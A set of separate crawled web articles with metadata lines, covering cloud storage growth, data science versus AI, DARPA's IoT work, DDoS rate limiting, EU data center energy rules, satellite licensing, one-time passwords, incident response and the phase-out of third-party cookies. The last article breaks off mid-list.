A good QA team helps establish a strong company reputation and ensures that it is successful by providing excellent products, which in turn provides more profit and customer loyalty.
if you want to work with an experienced QA engineer visit us at: www.selleo.com. | <urn:uuid:901225c3-3acc-45cf-a214-0cc726309e5c> | CC-MAIN-2022-40 | https://cioviews.com/why-do-we-need-qa-engineers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00602.warc.gz | en | 0.947212 | 2,681 | 2.6875 | 3 |
What is an Exabyte?
An exabyte is made up of bytes, which themselves are units of digital storage. A byte is made up of 8 bits. A bit—short for “binary digit”—is a single unit of data. Namely a 1, or a 0.
The International System of Units (SI) denotes “exa” as a multiplication by the sixth power of 1000 or (1018).
In other words, 1 exabyte (EB) = 1018bytes = 1,0006bytes = 1000000000000000000 bytes = 1,000 petabytes = 1 million terabytes = 1 billion gigabytes. Overwhelmed by numbers yet?
Why don’t we give you some examples of what these numbers actually look like? We created this infographic to help put it in perspective.
Share this Image On Your Site
Please include attribution to Backblaze.com with this graphic.
The Road to an Exabyte of Cloud Storage
So now that you know what an exabyte looks like, let’s look at how Backblaze got there.
Way back in 2010, we had 10 petabytes of customer data under management. It was a big deal for us, it took us two years to accomplish and, more importantly, it was a sign that thousands of customers trusted us with their data.
It meant a lot! But when we decided to tell the world about it, we had a hard time quantifying just how big 10 petabytes were, so naturally we made an infographic.
That’s a lot of hard drives. A Burj Khalifa of drives, in fact.
In what felt like the blink of an eye, it was two years later, and we had 75 petabytes of data. The Burj was out. And, because it was 2013, we quantified that amount of data like this…
Pop songs now average around 3:30 in length, which means if you tried to listen to this imaginary musical archive, it would take you 167,000 years. And sadly, the total number of recorded songs is only the tens to hundreds of millions, so you’d have some repeats.
That’s a lot of songs! But more importantly, our data under management had grown by 750%! But we could barely take time to enjoy it because five months later we hit 100 petabytes, and we had to call it out. Stacking up to the Burj Khalifa was in the past! Now, we rivaled Mt. Shasta…
But stacking drives was rapidly becoming less effective as a measurement. Simply put, the comparison was no longer apples to apples: the 3,000 drives we stacked up in 2010 only held one terabyte of data. If you were to take those same 3,000 drives and use the average drive size we had in 2013, about 4 terabytes of data per drive, the size of the stack would stay the same, as hard drives had not physically grown, but the density of the storage inside the drives had grown by 400%.
Regardless, the years went by, we launched an award-winning cloud storage service (Backblaze B2), and the incoming petabytes kept on accelerating—150 petabytes in early 2015, 200 before we reached 2016. Around there, we decided we needed to wait until the next big moment, and in February 2018, we hit 500 petabytes.
It took us two years to store 10 petabytes of data.
Over the next 7 years, by 2018, we stored another 500 petabytes.
And today, we reset the clock, because in the last two years, we’ve added another 500 petabytes. Which means we’re turning the clock back to 1…
Today, across 125,000 hard drives, Backblaze is managing an exabyte of customer data.
And what does that mean? Well, you should ask Ahin. | <urn:uuid:52808861-de54-44de-8ee4-bbba0a1f1855> | CC-MAIN-2022-40 | https://www.backblaze.com/blog/what-is-an-exabyte/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00602.warc.gz | en | 0.961777 | 814 | 3.3125 | 3 |
In the last couple of years there has been an explosion of workshops, conferences and symposia , books, reports and blogs which talk and cover the use of data in different fields and variations of words coming into existence such as ‘data’, ‘data driven’, ‘big data’. Some of them make reference to techniques – ‘data analytics’, ‘machine learning’, ‘artificial intelligence’, ‘deep learning’ etc.
Today we look more in detail about two important terms, widely used data science and artificial intelligence and understand the difference between them, the purpose for which they are deployed and how they work etc.
What is Data Science?
Data science is the analysis and study of data. Data science is instrumental in bringing the 4th industrial revolution in the world today. This has resulted in data explosion and growing need for industries to rely on data to make informed decisions. Data science involves various fields like statistics, mathematics, and programming.
Data science involves various steps and procedures such as data extraction, manipulation, visualization and maintenance of data for forecasting future events occurrence. Industries require data scientists which help them to make informed decisions which are data driven. They help product development teams to tailor their products which appeal to customers by analysing their behaviours.
What is Artificial Intelligence?
Artificial Intelligence (AI) is a broad field and quite modern. However, some ideas do exist in older times and the discipline was born a way back in 1956 in a workshop at Dartmouth College. It is presented in contact with intelligence displayed by humans, and other animals. Artificial intelligence is modelled after natural intelligence and talks about intelligent systems. It makes use of algorithms to perform autonomous decisions and actions.
Traditional AI systems are goal driven however contemporary AI algorithms like deep learning understand the patterns and locate the goal embedded in data. It also makes use of several software engineering principles to develop solutions to existing problems. Major technology giants like Google, Amazon and Facebook are leveraging AI to develop autonomous systems using neural networks which are modelled after human neurons which learn over time and execute actions.
Comparison Table: Data Science vs Artificial Intelligence
Below table summarizes the differences between the two terms:
|Definition||Comprehensive process which comprises of pre-processing, analysis, visualization and prediction
It is a discipline which performs analysis of data
|Implementation of a predictive model used in forecasting future events
It is a tool which helps in creating better products and impart them with autonomy
|Techniques||Various statistical techniques are used here||This is based on computer algorithms|
|Tools size||The tools subset is quite large||AI used a limited tool set|
|Purpose||Finding hidden patterns in data
Building models which use statistical insights
|Imparting autonomy to data model
Building models that emulate cognitive ability and human like understanding
|Processing||Not so much processing requirement||High degree of scientific processing requirements|
|Applicability||Applicable to wide range of business problems and issues||Applicable to replace humans in specific tasks and workflows only|
|Tools used||Python and R||TensorFlow, Kaffee, Scikit-learn|
Download the comparison table: Data Science vs Artificial Intelligence
Where to use Data Science?
Data science should be used when:
- Identification of patterns and trends required
- Requirement for statistical insight
- Need for exploratory data analysis
- Requirement of fast mathematical processing
- Use of predictive analytics required
Where to use Artificial Intelligence?
Artificial intelligence should be used when:
- Precision is the requirement
- Fast decision making is needed
- Logical decision making without emotional intelligence is needed
- Repetitive tasks are required
- Need to perform risk analysis | <urn:uuid:16f01010-5a67-483b-8748-77cb4a57bf84> | CC-MAIN-2022-40 | https://networkinterview.com/data-science-vs-artificial-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00602.warc.gz | en | 0.909739 | 802 | 3.09375 | 3 |
US defence agency DARPA is planning to harness the power of the Internet of Things (IoT) for military purposes.
With the US looking for increasingly innovative ways to gain an advantage in the battlefield, Defense Advanced Research Projects Agency (DARPA) is investing in the development of sensors and artificial intelligence systems that could facilitate the extraction and analysis of information from enemy devices and communication.
With information and intelligence becoming more and more key in the guerrilla warfare of the 21st century, tailored IoT systems could arm the US with the data needed to stay one step ahead.
DARPA research and funding has been partly responsible for plenty of technologies that are commonplace today. It played a part in the development of the internet, the precursor of what we now know as virtual reality, and modern global positioning systems (GPS).
Read more: US Air Force Mulls IoT Deployment
But DARPA is also looking into ways the IoT can be used in security networks in the case of an attack on US soil. A research program aimed at preventing attacks involving radiological “dirty bombs” and other nuclear threats has successfully developed and demonstrated a network of smartphone-sized mobile devices that can detect the tiniest traces of radioactive materials, according to a news post on the agency’s website.
“Combined with larger detectors along major roadways, bridges, other fixed infrastructure, and in vehicles, the new networked devices promise significantly enhanced awareness of radiation sources and greater advance warning of possible threats,” it said.
The news post from August 2016 read: “Combined with larger detectors along major roadways, bridges, other fixed infrastructure, and in vehicles, the new networked devices promise significantly enhanced awareness of radiation sources and greater advance warning of possible threats.”
Fighters become a part of the IoT
Graham Grose, Industry Director of the IFS Aerospace & Defence Centre of Excellence, pointed out that fighter jets are becomingly increasingly connected, and able to gather huge quantities of data from a single flight.
“The military is no stranger to new technology,” he said. “Companies in the field have been taking advantage of 3D printing, wearable and virtual reality technology to improve efficiency and reduce operating costs – IoT included.”
“With IoT, inexpensive sensors can collect important flight data. For example, at the unveiling of the new Bombardier C series at the Paris Airshow last year, it was reported that the Pratt & Whitney PW1000G family engine has around 5000 sensors able to generate up to 10GB of data per second. This means a single twin-engine aircraft with an average flight time of 12 hours can be producing up to 844TB of data. To put this in perspective, it is estimated that Facebook accumulates around 600TB of data per day.”
Speaking to Internet of Business, Grose also highlighted the importance of separating useful data from the ‘noise’. “The next step is for the support of a maintenance system that can filter out the ‘noise’ and suggest actions that provide real business benefits,” he said. “In A&D, these include shortening flight times, optimising jet fuel consumption, improving engine efficiency and reducing maintenance time and cost.” | <urn:uuid:66440b61-1eeb-42b5-b83e-c9edf112fae9> | CC-MAIN-2022-40 | https://internetofbusiness.com/darpa-wants-militarise-iot/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00602.warc.gz | en | 0.939246 | 676 | 2.890625 | 3 |
When searching for ways to protect your business’s network from distributed denial-of-service (DDoS) attacks, you may come across rate limiting. Countless businesses use rate limiting as part of their overall cybersecurity strategy. It allows them to limit activity on their respective network. While rate limiting can prove useful, though, it won’t necessarily shield your business’s network from DDoS attacks.
The Basics of Rate Limiting
Rate limiting is an approach to limiting the rate at which users can access or interact with a private network. Your business’s network can only handle so much traffic until it begins to experience performance issues. Turning a blind eye to traffic on your business’s network could lead to longer download times — or it could even take your business’s network offline. Of course, that’s the principle behind DDoS attacks. DDoS attacks are intended to overwhelm the resources of a network or server.
You can control traffic coming into your business’s network with rate limiting. Rate limiting does exactly what it sounds like: sets a limit for the rate at which users can interact with your business’s network. Interactions are typically defined as requests. When a user sends your business’s network a request, it will count as an interaction.
How Rate Limiting Works for DDoS Attacks
Your business’s network can still sustain a DDoS attack with rate limiting. DDoS attacks, of course, involve spamming a victim’s network with requests. They often involve thousands or even hundreds of thousands of devices. Each of these devices will spam requests in an attempt to overwhelm the victim’s network.
While it may not prevent your business’s network from being targeted with DDoS, rate limiting is still worth using. It’s a form of mitigation. Rate limiting can block the devices that are trying to spam your business’s network. As these devices continue to send requests, they’ll eventually reach the cap defined by the rate limit.
There are different types of rate limiting, but most of them work in the following way:
- You set a rate limit consisting of a maximum number of user requests per hour, minute or second.
- The rate limiting system will monitor traffic while counting the number of requests they send.
- Users who reach this limit will then be blocked, meaning they won’t be able to access your business’s network.
If you’re looking to mitigate the effects of DDoS attacks, you may want to leverage rate limiting. It won’t prevent DDoS attacks from occurring. It will, though, mitigate their effects. | <urn:uuid:1c5c3083-428e-40f7-a021-240fe71c56ba> | CC-MAIN-2022-40 | https://logixconsulting.com/2022/04/07/will-rate-limiting-protect-against-ddos-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00602.warc.gz | en | 0.929604 | 557 | 2.59375 | 3 |
European Union lawmakers are preparing to peg down the ballooning energy consumption of the block’s data center sector. The legislative push is part of an effort to avert the Earth's unfolding environmental catastrophe, which the United Nations described last week as humankind's "suicidal war" on nature. Yet, they are likely to take a light touch, DCK has learned.
In preparation for a decision by European governments this week on whether to demand that data centers become climate-neutral by 2030, the union’s executive body published a study detailing what the authors believed to be the most accurate forecast yet of the astounding growth in the amount of energy consumed by cloud computing systems.
The European Commission asked what legal powers it might use to cut the cloud’s energy consumption, and its consultants said the focus should be on toughening controls for the data centers that house the cloud systems. The consultants analyzed cloud computing architecture and concluded that it was so complex, so amorphous, and so quick to evolve, that it was impossible to measure it well enough to say when it was not energy-efficient enough to warrant intervention.
EU lawmakers are already preparing a volley of light-touch legal measures to usher the data center industry into greener operating practices. But tougher laws mooted this year -- such as a data center tax -- have been put under long-term review.
Cloud computing is a way for other (non-cloud) industries to cut their own carbon emissions, acknowledged the EU's Green Deal strategic plan for saving the planet, released back in January. But Europe might still need to act to make data centers more energy efficient, the plan warned. Addressing this question last week, EU advisors said that while growth in cloud computing's energy consumption had become "exponential," there was little more lawmakers could do besides creating a program of public information campaigns designed to make consumers and businesses aware of the energy cost that comes with their use of cloud services.
The advisors wanted tougher controls on data centers. Imposing energy-efficiency rules on data centers should be a priority, they said. Those rules should apply to both existing data centers and future ones going through approval processes. But those tougher recommendations did not make their formal shortlist.
EU digital legislators said the proposals would be the template for a final decision on what legal instruments it might use to achieve its declared aim of making data centers carbon neutral and energy efficient by 2030.
They put the tough measures onto a long-list of policies the EU could conceivably use but would take much time and effort, DCK understands. That includes a tax on dirty data centers and incentives for operators that invest in green data center technology. Multinational data center operators, faced with the prospect of shouldering a heavy cost for going greener but likely to catch a windfall from older data centers forced to close under any clampdown, lobbied lawmakers in Brussels to implement such measures earlier this year.
"Everything is still on the table," one of the Commission's top officials told DCK. "If you take 20 random professionals in any area and discuss going green, then incentives and taxation always come to the forefront. On tax, there's only so much power the EU has. But we are keeping our options completely open."
Too Complex to Measure
The Commission's consultants had considered an EU proposal for tax on cloud computing as well but concluded it would be impractical. This and other EU efforts to draft legislation to make cloud computing more energy efficient were hampered by the difficulty of measuring the environmental impact of such services.
"Legislation is a problem. Because if you want to enhance the sustainability of something, you have to measure it somehow, and measuring is a big, big problem for energy-efficient cloud computing. If you can't measure it, you don't have the possibility to have a law for it," said Dr. Therese Stickler, sustainable development expert at the Austrian Environment Agency, who made the policy recommendations in the EU report.
"We had a lot of discussion with experts at the European Commission on how to include cloud computing in the Energy Efficiency Directive (law). They said it was not possible, because there are too many intangible aspects in cloud computing that you can't really measure," she said.
The policy makers drew their conclusions from a cathedral-like schematic diagram of the many components that make up a cloud computing infrastructure, with fiber communications networks and data centers at the base and stack upon stack of software components. Energy-aware software and energy-saving networks were an aspiration but not within reach of policy makers.
"If you only look at the data centers, the material side of cloud computing, it's a little bit easier," said Stickler.
The Austrian agency gave multinational cloud and data center operators a chance to vote for their favored EU policy measures at an informal workshop last December. Alongside scientists, campaign groups, and officials from the EU, UN, and government bodies, they voted against EU proposals to impose energy-efficiency laws on their computing services. The group concluded that in addition to information campaigns, governments could do more to make data center energy efficiency more transparent and create standard measures to produce meaningful insights.
The proposal to impose mandatory efficiency targets on new or refurbished data centers had nevertheless made it onto the long-list of preliminary plans the EU has been exploring, the senior Commission official told DCK.
Many Ways to Regulate Data Center Energy
Meanwhile, the EU is already implementing laws to address data center energy efficiency. Foremost among them is its taxonomy regulation, a universal financial law that sets conditions for investors and financiers that want to claim their deals as green. Plans currently being examined by government committees and awaiting conclusion of a public consultation would in 2022 impose energy-efficiency conditions on anyone who claimed as green any data centers put up for collateral or lumped into a financial offering.
"Data centers are trying to portray themselves as being green when they ask for loans, and when they justify their refurbishments. And financial institutions often portray their instruments, which are principally bonds, as green," said the official.
"They say, 'Invest in my bond because it's green and would be good for the environment.' If part of the underlying assets are data centers, they would have to ensure those investments are poured into compliant data centers. They would be forced to back this statement up with compliance with the European Code of Conduct on Data Centre Energy Efficiency," he said. The same Code of Conduct -- which has been criticised for having no teeth -- was becoming the basis of other EU green laws. Stickler's policy report said it should be the starting point for further action.
Other laws being passed in Brussels include a reform that would make data centers part of the Eco-Design Directive, which stipulated this year that computer servers could not be sold for use in simple computing environments in Europe unless they met energy efficiency measures.
The Commission also has plans to update public procurement regulations, and it’s possible but not likely that public money would be precluded from being spent on data center services that did not meet green standards.
It is also drafting a law to make it more feasible to pipe heat from industrial sources like data centers into district heating projects. The Commission hopes other general industrial initiatives will count toward its tally of green data centers as well.
The point of it all was to do something about the fact that, while the energy demand of cloud computing was growing exponentially, its energy efficiency was not.
"This growth is so strong that it has more than offset the significant efficiency gains achieved at all levels of hardware, software, and data centre infrastructure," said last week’s report.
By 2025, total data center energy consumption in Europe will increase 21 percent on 2018 levels, when data centers consumed 2.7 percent of all electricity in Europe, the report forecasted. Cloud computing will be responsible for 60 percent of all energy consumed by data centers by 2025, nearly doubling its portion’s size in 2018.
The Commission official said the research was a "breakthrough," because it was the first clear estimate of data center energy consumption in Europe. It showed how previously existing forecasts of data center energy consumption differ wildly and called their veracity into question. Its own cautious forecast ventured only that Europe's data center energy consumption will reach 92.7 TWh in 2025, about three times as much electricity as the whole of Ireland consumed in 2018.
"It's possible the energy consumption of data centers will more than double in the next 10 years," said Dr. Ralph Hintemann, senior researcher at the Borderstep Institute, who authored the forecasts in the EU study. Recent events had not changed his forecast, he said.
"We know that in general, the data center market was affected very little by the [COVID-19] crisis,” Hintemann said. “There are some parts of the market -- especially [companies' own] on-premises data centers, where you have much less spending. But on the other hand, we have much more cloud computing. You have cloud data centers, where demand is increasing." | <urn:uuid:4f7eda7d-1b75-4822-bd73-053d46f1ad05> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/regulation/europe-edges-closer-green-data-center-laws | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334332.96/warc/CC-MAIN-20220925004536-20220925034536-00002.warc.gz | en | 0.966786 | 1,867 | 2.59375 | 3 |
Satellites are becoming more useful for broadband distribution as reusable rockets and launch vehicles are being miniaturized, lowering the costs for launching space equipment. The changes mean new competition in the broadband marketplace and new opportunities for rural residents who lack access to high-speed internet access. That’s led to startups popping up all over the country.
Last month, for example, SpaceX launched the first 60 low-earth orbit satellites of its Starlink constellation, managing to fit all of them into a single Falcon 9 rocket. SpaceX’s first 60 satellites took a few months to build but CEO Elon Musk said in May the company aims to get that down to a batch at least every two weeks — a rate he believes the company could reach by the end of the year, reported the Los Angeles Times. The FCC moved quickly to green light to satellite entrepreneurs like OneWeb, SpaceX, and O3b and is considering other applications from entrants like Amazon and Boeing.
The changes also mean the agency needs to change its satellite rules. That’s why FCC Chairman Ajit Pai circulated among his colleagues yesterday a draft order to make it easier and cheaper to license small satellites, or smallsats. “I see no reason why a satellite the size of a shoebox, with the life expectancy of a guinea pig, should be regulated the same way as a spacecraft the size of a school bus that will stay in orbit for centuries,” Pai told attendees of a Chamber of Commerce roundtable.
Under the draft order, applicants for satellites weighing less than about 400 lbs. could choose a streamlined alternative to existing licensing procedures that would feature an easier application process, a lower application fee, and a shorter timeline for review. It would offer potential RF interference protection for critical communication links.
Note that this process would be different from the one used by the conventional non-geostationary satellite constellations in the Commission’s processing rounds and wouldn’t affect proposals for large broadband-delivery constellations like those being deployed by SpaceX and OneWeb. Pai delivered the speech just days before the 50th anniversary of the Apollo 11 moon landing on July 20.
July 10, 2019 | <urn:uuid:dc258878-7f91-4887-88c7-4d5594ec9f82> | CC-MAIN-2022-40 | https://insidetowers.com/cell-tower-news-fcc-to-update-satellite-licensing-to-facilitate-broadband/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335303.67/warc/CC-MAIN-20220929003121-20220929033121-00002.warc.gz | en | 0.937006 | 447 | 2.765625 | 3 |
Federal Information Processing Standard
The Federal Information Processing Standards (FIPS) are a set of US Government security requirements for data and its encryption.
FIPS are publicly shared and encouraged by the US Federal Government, and overseen by the National Institute of Standards and Technology (NIST) of the Department of Commerce. Government agencies, partners, and those wanting to do business with the federal government are required to adhere to FIPS guidelines.
FIPS are applied to the potential use case and align with the government data's perceived value. The complying, or regulated party, then, must adhere to standards used to handle government information. As the secrecy and sensitivity of government data rises from classified to (top) secret, the severity of the FIPS standard rises as it is applied to the persons, practices, and technologies in place to hold and transmit the data.
Among FIPS standards are ones that cover data encryption such as the Advanced Encryption Standard (AES), which is a FIPS standard.
"As a vetted, DFARS-compliant solutions provider handling 'secret' data, all of our team members underwent and passed background checks. And, our facilities have been inspected. We also are required to use tamper-resistant hardware tokens that are FIPS 140-2 certified to access the systems where we hold DoD information." | <urn:uuid:fd12aceb-6b73-4550-8cad-cc061b0d43d5> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/federal-information-processing-standard | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335303.67/warc/CC-MAIN-20220929003121-20220929033121-00002.warc.gz | en | 0.915622 | 272 | 2.90625 | 3 |
A one-time password can be used for many authentication needs including securing private information or creating an alternative to a password reset.
What is a one-time password? An OTP is a random series of letters or numbers that can be used only once to authenticate a user. An OTP is a part of a multi-factor authentication process.
How Do One-Time Passwords Work?
One-Time Passwords were created to address some of the perceived weaknesses of traditional passwords, namely those related to time, storage and usage. On its surface, OTP operates much like a password. But, because it is dynamically and randomly generated, it’s only good for one use, or use at a particular time. In that way, it actually functions much like a token in that the authentication provider assumes that the user possesses a specific account or device.
Passwords as an authentication method have a few drawbacks:
- Security: Passwords, generally speaking, aren’t very secure. While complex passwords are harder to crack and can work with the right configuration of complex passwords and password storage passwords don’t protect against theft. If a password is stolen, the system will assume that anyone with that password is authentic. This is why phishing is still one of the most prevalent forms of cyberattack. While passwords can be secured, they are by far not the most secure option for authentication and identity management.
- User Experience: Passwords are hard to remember, which means that users often reuse passwords, use simple passwords, or use default passwords—all of which open up critical systems to hacks and threats.
- Storage: Passwords are typically stored, hashed, and encrypted in central databases. If that database is breached, it’s only a matter of time before that information is compromised.
Because passwords on their own aren’t generally considered very secure, many organizations use multi-factor authentication that couples passwords with a secondary authentication method. MFA coordinates authentication by combining two types of verification from three different categories:
- Something the User Knows: This includes passwords and PINs in combination with usernames.
- Something the User Has: This includes tokens or one-time passwords.
- Something the User Is: This includes biometrics, like fingerprint or facial scans.
This is where one-time passwords play a role. A one-time password is a password string generated by a server or application either at the point of authentication or on a rolling, time-focused basis.
For example, many MFA solutions will offer the option to send an OTP over SMS or email so that only the user can read it. The assumption is that only the user has access to their email or mobile device. Furthermore, if the user doesn’t log in with the OTP, it will expire.
As another example, the Google Authenticator app can sync with authentication providers across multiple services. The app will refresh OTPs every 30 seconds, separate from any specific login attempt. The user can enter that code when prompted for MFA.
NIST Requirements and One-Time Passwords
One-time passwords are a common form of MFA, so much so that the National Institute of Standards and Technology has defined several requirements for their use in compliant authentication systems.
NIST Special Publication 800-63-3 outlines Authentication Assurance Levels that define the extent to which a user is authenticated in a system. AAL is broken down into three levels:
- AAL1: At this level, users must be authenticated with single- or multi-factor authentication, the latter of which can include single-factor or MFA OTPs. Multi-factor OTPs are used only after the user has provided initial authentication information (a username and password, for example).
- AAL2: AAL2 requires an MFA solution that uses either (a) a physical authenticator and a secret (such as a password) or (b) a physical authenticator and an associated biometric. In this case, the physical authenticator is the OTP-generating device and can include a mobile device with secure OTP functionality.
- AAL3: This level requires using a hardware-based authentication method (a physical token like a USB key), impersonation resistance, and MFA. OTP solutions based on hardware (a special piece of hardware generating OTPs) are acceptable here.
What Are the Challenges and Benefits of One-Time Passwords?
Because one-time passwords are relatively easy to implement, many consumer and business users have come across them in one form or another. Many popular platforms use OTPs as MFA solutions, working with compatible OTP generating apps or simple SMS or email messaging implementations.
As a single- or multi-factor solution, OTPs provide several distinct advantages:
- Security: Because OTPs are dynamically generated, they are much more secure than static passwords. The one-time password is only available for a limited time, under limited circumstances, which means that the window for vulnerability is low.
- Ease of Use: There is no need to remember an OTP, since it is entered at the time of use. As such, OTPs generally eliminate the problems of reused passwords or phishing attacks so long as the mode of generation and delivery remain secure.
- Avoid Replay Attacks: Many threats, including advanced persistent threats, rely on continuing access to a system. OTPs can mitigate certain kinds of threats by closing off channels of access due to expiring authentication credentials.
In terms of challenges related to OTPs, the primary ones are tied to loss of devices or interception of communications. If a user has their phone stolen and it is tied to authentication apps, SMS, or email, the thief can use the device to breach accounts. This isn’t a problem just for OTPs, however.
Additionally, if a user employs hardware-based OTP devices for special cases, the theft of that device can create a security hole.
Finally, the interception of communications like emails or SMS can expose OTPs sent through those channels. This includes cases where a user, a victim of a phishing attack, provides real-time OTP information to a hacker.
1Kosmos BlockID Combines One-Time Passwords with Advanced Authentication
One-time passwords are a useful part of any authentication scheme. They mesh well with other authentication methods and fit into the user experience with simple, device-based approaches.
1Kosmos uses OTPs alongside advanced biometrics, streamlined onboarding, and compliant identity proofing to center user authentication into user devices. This way, your organization can deploy strong, compliant authentication in a way that allows users the ease of access they enjoy with other login services.
The following features are included with 1Kosmos BlockID:
- Identity Proofing: BlockID includes Identity Assurance Level 2 (NIST 800-63A IAL2), detects fraudulent or duplicate identities, and establishes or reestablishes credential verification.
- Identity-Based Authentication Orchestration: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through identity credential triangulation and validation.
- Integration with Secure MFA: BlockID readily integrates with a standard-based API to operating systems, applications, and MFA infrastructure at AAL2. BlockID is also FIDO2 certified, protecting against attacks that attempt to circumvent multi-factor authentication.
Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API, including private blockchains.
Privacy by Design: 1Kosmos protects personally identifiable information in a private blockchain and encrypts digital identities in secure enclaves only accessible through advanced biometric verification.
To learn more about BlockID MFA and security, sign up for the 1Kosmos newsletter. Or, to see how 1Kosmos integrates several advanced security features into a single authentication platform, check out our LiveID data sheet. | <urn:uuid:605d4654-4591-4cfd-b0ee-4d64ba595a48> | CC-MAIN-2022-40 | https://www.1kosmos.com/authentication/one-time-password/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335448.34/warc/CC-MAIN-20220930082656-20220930112656-00002.warc.gz | en | 0.912755 | 1,673 | 3.078125 | 3 |
A cyber attack can be fatal for any business. It is not just the big corporations that should be concerned. In fact, it is actually small and medium sized businesses that are the most likely to face an attack and the consequences are dire for these entities.
Up to 60 percent of small to medium sized businesses are forced to shut down permanently after a data breach. That is why every organization should have a response plan in place in case of a breach or attack.
There is no doubt that your company should be vigilantly trying to protect against would be attacks but even if you are doing everything you can to prevent an attack, you still need to be prepared if your network is breached. Just one misstep by an employee could expose your entire network.
On average, 56 percent of companies that are breached do not discover the breach for months and companies that suffer an attack, such as a ransomware attack, will on average be down for at least two weeks.
Incident response planning should start with a cyber risk and resilience review. Knowing where you are must vulnerable makes it easier to identify a breach when it happens. You then want to create a playbook of protocols and procedures for quickly addressing the fallout of a breach. This can include automatic data backups, automated responses that purge infected systems, quarantine parts of your network that may be compromised and restoring your network to a safe state.
There are countless ways that a network can be attacked. You may not need to know every possible attack vector, you should leave that to your vCISO, but you should be aware of the most popular and effective attack types.
- Phishing – These types of attacks involve sending a fraudulent communication that tricks the receiver into giving up sensitive material. Often these come in the form of an email that asks for protected information such as passwords, redirects the person to a malware site, or has the receiver download malware to their computer. While these attacks are relatively unsophisticated, they work surprisingly well and often.
- Distributed Denial of Service Attack (DDoS) – Hackers use DDoS attacks to shut down networks. The way these attacks work is through use of a bot network of infected computers that overloads a network with a flood of fake requests. This makes it so that legitimate requests to the server cannot get through.
- Malware – Malicious software can get onto your computer systems through bad links or downloading infected attachments. This software is often used to steal sensitive data.
- SQL Injection – Structured Query Language (SQL) has widespread use for maintaining databases. SQL injection involves an attacker inserting code into an SQL server that makes it reveal information contained in the database, destroy data, or spoof an identity.
If we’ve learned anything from crime shows on television, it’s that there are always traces left behind after a crime has been committed. In the digital landscape, this is true as well. A cyber criminal will leave behind some traces of how they got in and out. Digital forensics is a matter of looking through the electronic data available and making an interpretation based on the evidence of what may have occurred.
The digital forensics process generally involves imaging of breached data, analysis of the data and a report of the findings. That process can include recovering deleted files and extracting registry information to see when and who accessed the data.
For instance, imagine your company is breached and data is stolen during the weekend. Where would you start? The process could be as simple as reviewing your registry data to see who accessed your network before the breach occurred. You may then find that the login information for an employee were used to access your server remotely. An analysis of that employees whereabouts at the time of the breach and his email history may reveal he was the victim of a phishing attack and his credentials were stolen. Digital forensics is just about following the clues but you have to know what to look for.
The Alliant Cybersecurity Advantage
The worst thing you can do after you suffer a cyber attack is to not have a plan. Alliant Cybersecurity and our experts will not only analyze your network to identify vulnerabilities and help you defend against attacks but our response planning will make sure you are prepared if the worst happens.
Reach out to us today for a complimentary review. | <urn:uuid:567b4e0d-4db3-4326-a79a-8ccd8aec66af> | CC-MAIN-2022-40 | https://www.alliantcybersecurity.com/our-services/respond/incident-response/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335448.34/warc/CC-MAIN-20220930082656-20220930112656-00002.warc.gz | en | 0.958283 | 886 | 2.65625 | 3 |
Of all the changes coming to digital marketing, none may be more impactful and controversial than Google’s phase-out of third-party cookies on Chrome browsers (Google’s most recent announcement). Advertisers have been using third-party cookies to collect data on user behavior and interests online for many years. This process has allowed advertisers to hone in on target-rich audiences across multiple advertising platforms, producing one of the last decade’s most successful digital marketing strategies.
But with data privacy becoming increasingly important to users online, this marketing practice, and others, have not been looked at favorably. According to Google, “Some data practices don’t match up to user expectations for privacy, and it is in the name of privacy that Google has initiated the Privacy Sandbox, which will be discontinuing Google Chrome’s support of third-party pixels.”
Let’s dig in.
What are Tracking Cookies?
Tracking cookies are small data files that websites store on your computer for future reference and retrieval. They’re typically used to manage user sessions, deliver personalized content, and, as their name suggests, for tracking. There are many types of cookies, but for our discussion, we’ll focus on first- and third-party cookies:
First-party cookies are generated by website owners and used exclusively on the websites that generate them. They are generally used to enhance your website’s user experience by storing user preferences (such as preferred language, login information, deliver chats, etc.) Marketers also use first-party cookies to track website visitor demographics and behavior, usually in basic analytics (e.g., session, location, device, shopping cart items, etc.) The important things to remember are that third parties don’t use this data for advertising, and first-party cookies don’t provide site owners with insights beyond what they collect directly on those websites.
Third-party cookies are generated by parties other than the site owner – e.g., ad networks. Like first-party cookies, they collect tracking data from web visitors. That data is used for marketing purposes (e.g., serving content or ads). Third-party cookies enable advertisers to target specific audiences on third-party platforms or websites based on user behavior and preferences.
Here’s an example of how a third-party cookie might be used:
A web user lands on Awesome Company’s product page. Later, when visiting other websites (e.g., Facebook, a third-party blog, etc.), the user sees an advertisement for the product they saw on Awesome Company’s website. (This ad practice is called “retargeting.”)
Why a Third-Party Cookie Phase-Out was Inevitable
Privacy is a growing concern for online users and authorities in the United States and around the world. According to PEW Research Center, 79% of Americans show “concern over data usage,” and 59% say they have a “lack of understanding about data use.” These realities have prompted companies like Google to become more privacy-focused in their online products and services. Google isn’t the first. In the most visible example, Apple’s blocking of third-party cookies by default has been at the heart of Facebook parent company Meta’s recent ad woes. Firefox automatically disables cross-site tracking cookies and gives you features to manage your level of privacy while navigating to different websites.
How Marketers are Preparing for Third-Party Cookie Phase-Out
The biggest impact of this change will be felt in retargeting. That means B2C activities will take the brunt of the disruption, but plenty of B2B players will need to adjust well. There’s still a lot to work with:
